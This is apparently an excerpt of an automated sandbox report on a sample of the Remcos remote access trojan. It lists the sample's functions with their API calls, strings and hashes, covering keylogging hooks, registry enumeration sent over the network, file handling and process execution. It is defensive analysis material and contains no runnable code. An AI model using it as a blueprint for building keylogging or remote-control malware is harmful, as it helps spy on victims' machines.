connect.WS2_32(FFFFFFFF,00000000,00000000), ref: 02134B47
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 02134C67
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 02134C75
WSAGetLastError.WS2_32 ref: 02134C88

Part of subcall function 0214B756: GetLocalTime.KERNEL32(00000000), ref: 0214B770

Strings

Connection Failed: , xrefs: 02134CAA
PkGNG, xrefs: 02134B2F
TLS Handshake... | , xrefs: 02134B6B

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: Connection Failed: $PkGNG$TLS Handshake... |
API String ID: 994465650-2799020840
Opcode ID: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
Instruction ID: cd6790abd4fd4a68f6b0ce6bd5abc3f2b1590f2f4be59ec9a4d1b2ae548e0bc7
Opcode Fuzzy Hash: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
Instruction Fuzzy Hash: 95414621BC0205BFCB1ABB78CC56A2D7A27BF42304F40015ADC0247A91EF22DD248BE7

Function 02131AD1 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 02131B25
RtlExitUserThread.NTDLL(00000000), ref: 02131B5D
waveInUnprepareHeader.WINMM(00001E40,00000020,00000000,?,00000020,00474EE0,00000000), ref: 02131C6B

Part of subcall function 021649D7: __onexit.LIBCMT ref: 021649DD

Strings

NG, xrefs: 02131BF7
PkG, xrefs: 02131AEF
XMG, xrefs: 02131B69
NG, xrefs: 02131B74

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ExitHeaderInit_thread_footerThreadUnprepareUser__onexitwave
String ID: PkG$XMG$NG$NG
API String ID: 1265842484-3151166067
Opcode ID: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
Instruction ID: 33c4b94dc3a5f8d3f38a66dfffb54138406bddb88a681b51e46f0a32f8f3c467
Opcode Fuzzy Hash: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
Instruction Fuzzy Hash: C641DF322842509FC726FB24ED90AAE73A7BB95310F10452DE55A961E0EF306D49CF5A

Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004018BE
RtlExitUserThread.KERNEL32(00000000), ref: 004018F6
waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

Strings

PkG, xrefs: 00401888
NG, xrefs: 00401990
XMG, xrefs: 00401902
NG, xrefs: 0040190D

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ExitHeaderInit_thread_footerThreadUnprepareUser__onexitwave
String ID: PkG$XMG$NG$NG
API String ID: 1265842484-3151166067
Opcode ID: ab8d4540a5e840cac24f36bccc8ad2254c967d51e75ce4050104363d47391c87
Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
Opcode Fuzzy Hash: ab8d4540a5e840cac24f36bccc8ad2254c967d51e75ce4050104363d47391c87
Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E

Function 02143F74 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 02143FAD

Part of subcall function 02143CBC: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 02143D23
Part of subcall function 02143CBC: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 02143D52

Part of subcall function 02134D08: send.WS2_32(?,00000000,00000000,00000000), ref: 02134D9D

RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 0214411B

Strings

TG, xrefs: 02144101
xUG, xrefs: 0214410D
NG, xrefs: 0214408A
hdF, xrefs: 021440E7
NG, xrefs: 02143FD0

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseEnumInfoOpenQuerysend
String ID: hdF$xUG$NG$NG$TG
API String ID: 3114080316-2774981958
Opcode ID: 3930ee9b3acf42e1765bfcfe6f502652953ac93686ef140da44ca2d6386146ff
Instruction ID: ede9f15b55ec56b20a2cea02fbb25e4fd35ded8343c4de921b09b3cb29c2fe0b
Opcode Fuzzy Hash: 3930ee9b3acf42e1765bfcfe6f502652953ac93686ef140da44ca2d6386146ff
Instruction Fuzzy Hash: 054112316882406FC32AF734EC50AEF7397AFE1340F40883EA54A57194EF346D498EA6

Function 02147F42 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 103filesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 02148193: __EH_prolog.LIBCMT ref: 02148198

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 02148043
CloseHandle.KERNEL32(00000000), ref: 0214804C
DeleteFileA.KERNEL32(00000000), ref: 0214805B
ShellExecuteEx.SHELL32(0000003C), ref: 0214800F

Part of subcall function 02134D08: send.WS2_32(?,00000000,00000000,00000000), ref: 02134D9D

Strings

@, xrefs: 02147FF1
0VG, xrefs: 0214801C
<, xrefs: 02147FEA

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: 0VG$<$@
API String ID: 1704390241-2149486900
Opcode ID: 00a5e06831a376f49780a955bb9c5234eea10acf0c0088298b22f158594e4f43
Instruction ID: 74a01021aabc15faabc95dc7660a71bcb126039a56e9196fef014293176cf884
Opcode Fuzzy Hash: 00a5e06831a376f49780a955bb9c5234eea10acf0c0088298b22f158594e4f43
Instruction Fuzzy Hash: 36318D319802099FCB06FBA0DC55AFD7737BF20311F504269E90A660A0EF756E8ACF91

Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5

Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
Part of subcall function 00404B96: SetEvent.KERNEL32(00000000), ref: 00404BC3

Strings

.part, xrefs: 00407989

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID: .part
API String ID: 1303771098-3499674018
Opcode ID: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
Opcode Fuzzy Hash: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A

Function 0213A51F Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0213A53A
SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0213A548
GetLastError.KERNEL32 ref: 0213A554

Part of subcall function 0214B756: GetLocalTime.KERNEL32(00000000), ref: 0214B770

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0213A5A2
TranslateMessage.USER32(?), ref: 0213A5B1
DispatchMessageA.USER32(?), ref: 0213A5BC

Strings

Keylogger initialization failure: error , xrefs: 0213A568

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error
API String ID: 3219506041-952744263
Opcode ID: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
Instruction ID: cd16fbaebc142cccdcb11f3f4a4ff5c92160d9ed4a5dc268d5f3ec9fb3401cb4
Opcode Fuzzy Hash: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
Instruction Fuzzy Hash: 9B118F32594301ABCB127B75DC0996A77EEEB99616B00067DF886C2590EB34D900CB66

Function 0041CD9B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32(00475338), ref: 0041CDA4
GetConsoleWindow.KERNEL32 ref: 0041CDAA
ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2

Strings

5.1.0 Pro, xrefs: 0041CE0B
CONOUT$, xrefs: 0041CDD0
Remcos v, xrefs: 0041CDFD

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Console$Window$AllocOutputShow
String ID: Remcos v$5.1.0 Pro$CONOUT$
API String ID: 4067487056-1043272453
Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E

Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97

Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00447679
__freea.LIBCMT ref: 00447723
__freea.LIBCMT ref: 00447741

Part of subcall function 00435E40: _free.LIBCMT ref: 00435E56

Strings

am/pm, xrefs: 004477A4
zD, xrefs: 004479AB
a/p, xrefs: 00447808

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16_free
String ID: a/p$am/pm$zD
API String ID: 2936374016-2723203690
Opcode ID: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
Opcode Fuzzy Hash: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9

Function 021793F7 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02179479
_free.LIBCMT ref: 0217949D
_free.LIBCMT ref: 02179624
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 02179636
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 021796AE
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 021796DB
_free.LIBCMT ref: 021797F0

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
Instruction ID: 1b3a680e27530b5c3977f00343a6d51f1a22f7acfedaf8698108c099d001d4f4
Opcode Fuzzy Hash: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
Instruction Fuzzy Hash: CFC13871980255AFDB24DF78DD40BAE7BBEEFC5310F1841AAE89597250E7308E49CB90

Function 02183FEA Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,021842C3,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 02184096
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,021842C3,00000000,00000000,?,00000001,?,?,?,?), ref: 02184119
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,021842C3,?,021842C3,00000000,00000000,?,00000001,?,?,?,?), ref: 021841AC
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,021842C3,00000000,00000000,?,00000001,?,?,?,?), ref: 021841C3

Part of subcall function 0217639E: RtlAllocateHeap.NTDLL(00000000,02165523,?), ref: 021763D0

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,021842C3,00000000,00000000,?,00000001,?,?,?,?), ref: 0218423F
__freea.LIBCMT ref: 0218426A
__freea.LIBCMT ref: 02184276

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 2f35f7b28a9b161c6b4b86fc14a2c4870af410b049fb6bd856720b5dfaccd2e8
Instruction ID: 6fce9f3d69d8e7593fb9f8ed42b6d40cf18faf420eba2996fcc63514b14bd69c
Opcode Fuzzy Hash: 2f35f7b28a9b161c6b4b86fc14a2c4870af410b049fb6bd856720b5dfaccd2e8
Instruction Fuzzy Hash: 2C91C271E842179EDF24AEA4DCC0AEFBBB6AF49314F150629E811E7280DF25D840CF61

Function 02144B71 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

udp, xrefs: 02144CAD

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: udp
API String ID: 0-4243565622
Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
Instruction ID: 6a8eb82a3d9e3cf20191d5abc870f44f70133f47356080f500201e29891a330a
Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
Instruction Fuzzy Hash: 7271AB746883468FD728CF14C48472BB7E1AF84349F18483EF89997260EF75CA45CBA2

Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B

Strings

TG, xrefs: 00413BFD
[regsplt], xrefs: 00413C17
xUG, xrefs: 00413C46

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]$xUG$TG
API String ID: 3554306468-1165877943
Opcode ID: 70af85d0e39219a3cc5b47c29f9f431ec4c2a73b4ff335372e486b75c5ef9206
Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
Opcode Fuzzy Hash: 70af85d0e39219a3cc5b47c29f9f431ec4c2a73b4ff335372e486b75c5ef9206
Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9

Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00456D49

Strings

D[E, xrefs: 00456C6D, 00456D5E
D[E, xrefs: 00456D10

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free
String ID: D[E$D[E
API String ID: 269201875-3695742444
Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D

Function 0213DA66 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 02142AB7: TerminateProcess.KERNEL32(00000000,?,0213DA76), ref: 02142AC7
Part of subcall function 02142AB7: WaitForSingleObject.KERNEL32(000000FF,?,0213DA76), ref: 02142ADA

Part of subcall function 0214395F: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 0214397B
Part of subcall function 0214395F: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 02143994
Part of subcall function 0214395F: RegCloseKey.ADVAPI32(?), ref: 0214399F

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0213DAC0
ShellExecuteW.SHELL32(00000000,00466108,00000000,00466468,00466468,00000000), ref: 0213DC1F
ExitProcess.KERNEL32 ref: 0213DC2B

Strings

hdF, xrefs: 0213DC09
8SG, xrefs: 0213DA76
exepath, xrefs: 0213DA98

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: 8SG$exepath$hdF
API String ID: 1913171305-3379396883
Opcode ID: 4dcae598cd04c7a5eb28f2dbc248d97d982a096e6cd91abbfae7d17dba9800e7
Instruction ID: ac5a7106612fbef2fb5712fe683a071ab8271d4fb4334ae0b1c7191d5e26a190
Opcode Fuzzy Hash: 4dcae598cd04c7a5eb28f2dbc248d97d982a096e6cd91abbfae7d17dba9800e7
Instruction Fuzzy Hash: 2A4161329901186ECB16FB64EC90DFE777BBF50700F10016AE90AA7190EF745E8ACE94

Function 00413D0D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46

Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4

Strings

NG, xrefs: 00413D69
TG, xrefs: 00413E9A
NG, xrefs: 00413E23
xUG, xrefs: 00413EA6

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseEnumInfoOpenQuerysend
String ID: xUG$NG$NG$TG
API String ID: 3114080316-2811732169
Opcode ID: ff7dc7b16fab8b1ecf7ff8f4cbeb3d5cc8df63901bf000708fa7d3b6b4f74e1a
Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
Opcode Fuzzy Hash: ff7dc7b16fab8b1ecf7ff8f4cbeb3d5cc8df63901bf000708fa7d3b6b4f74e1a
Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E

Function 0045112C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
__alloca_probe_16.LIBCMT ref: 004511B1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
__freea.LIBCMT ref: 0045121D

Part of subcall function 00446137: RtlAllocateHeap.KERNEL32(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169

Strings

PkGNG, xrefs: 0045112E

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID: PkGNG
API String ID: 313313983-263838557
Opcode ID: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
Opcode Fuzzy Hash: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94

Function 02144FED Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 109libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0214503C
LoadLibraryA.KERNEL32(?), ref: 0214507E
LoadLibraryA.KERNEL32(?), ref: 021450DD
GetProcAddress.KERNEL32(00000000,?), ref: 02145105

Strings

IA, xrefs: 02145144
IA, xrefs: 02145001

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressDirectoryProcSystem
String ID: IA$IA
API String ID: 4217395396-1988072088
Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
Instruction ID: f09c5d0b9e67b7cb3e6f329417e446c88474afc720a1348288459e0e295aa757
Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
Instruction Fuzzy Hash: B431D7B25413157BD3209B64DC84E9FB7EDAF54B44F804A25F94C93200EB74D945CBEA

Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
